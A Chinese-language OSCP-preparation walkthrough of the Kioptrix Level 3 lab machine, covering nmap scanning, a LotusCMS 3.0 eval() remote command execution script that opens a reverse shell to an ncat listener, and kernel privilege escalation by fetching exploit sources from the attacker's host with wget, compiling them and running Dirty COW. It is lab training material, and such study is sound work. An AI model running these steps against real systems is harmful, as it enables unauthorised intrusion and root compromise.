Kioptix Level 3

oscp备考，oscp系列——Kioptix Level 3靶场

nmap扫描

主机发现

└─# nmap -sn 192.168.80.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-09 00:33 CST
Nmap scan report for 192.168.80.1
Host is up (0.00014s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.80.2
Host is up (0.00014s latency).
MAC Address: 00:50:56:FF:B0:85 (VMware)
Nmap scan report for 192.168.80.151
Host is up (0.000074s latency).
MAC Address: 00:0C:29:83:12:1E (VMware)
Nmap scan report for 192.168.80.254
Host is up (0.000085s latency).
MAC Address: 00:50:56:FD:A3:29 (VMware)
Nmap scan report for 192.168.80.136
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 21.92 seconds

端口扫描

• 端口扫描，可以发现只有两个端口开放，不过为了保险起见，我们将速度放慢一倍再扫描一次，可以发现结果一样
• 一般22端口优先级不高，端口比较少，直接看网站，节约时间不进行下面的扫描了

└─# nmap --min-rate 10000 -p- 192.168.80.151 k3/nmap
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-09 00:35 CST
Unable to split netmask from target expression: "k3/nmap"
Nmap scan report for 192.168.80.151
Host is up (0.0023s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:83:12:1E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 4.59 seconds

获取www-data权限

发现LotusCMS历史漏洞

• 查看80端口，发现有一个login，点击一下
  
• 简单尝试了弱口令+sql注入，发现不行
• 可以发现是一个cms，LotusCMS
  
• 使用searchsploit搜索一下

└─# searchsploit LotusCMS            
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                           |  Path
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
LotusCMS 3.0 - 'eval()' Remote Command Execution (Metasploit)                                                            | php/remote/18565.rb
LotusCMS 3.0.3 - Multiple Vulnerabilities                                                                                | php/webapps/16982.txt
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

反弹shell

• 尝试使用18565.rb进行反弹shell，识别了，脚本运行环境不对

└─# ruby 18565.rb 
<internal:/usr/lib/ruby/vendor_ruby/rubygems/core_ext/kernel_require.rb>:86:in `require': cannot load such file -- msf/core (LoadError)
        from <internal:/usr/lib/ruby/vendor_ruby/rubygems/core_ext/kernel_require.rb>:86:in `require'
        from 18565.rb:8:in `<main>'

• 因为oscp考试只能使用一次msf，所以我们默认不使用，去网上搜索一下发现有.sh脚本实现的

https://github.com/Hood3dRob1n/LotusCMS-Exploit

• 下载下来，发现不会用，查看项目给的视频，太贴心了
  
  
  发现需要安装ncat
• 安装ncat

apt install ncat

• 反弹shell

ncat -lv 7777

./lotusRCE.sh 192.168.80.151 /
输入本地kali的IP，接收shell的IP
输入反弹shell的端口

提权

查看版本

uname -a

Linux 2.6.24-24-server

查看发行版本

cat /etc/*-release  

DISTRIB_ID=Ubuntu                                                                                       
DISTRIB_RELEASE=8.04                                                                                     
DISTRIB_CODENAME=hardy                                                                                   
DISTRIB_DESCRIPTION="Ubuntu 8.04.3 LTS" 

发现和level2的版本很接近，尝试使用提权

python3 -m http.server 80

cd /tmp
wget http://192.168.80.136/1397.c
gcc 9545.c -o 9545

尝试suid提权，失败

尝试使用，脏牛提权

wget http://192.168.80.136/dirty.c

gcc -pthread dirty.c -o dirty -lcrypt

./dirty 123456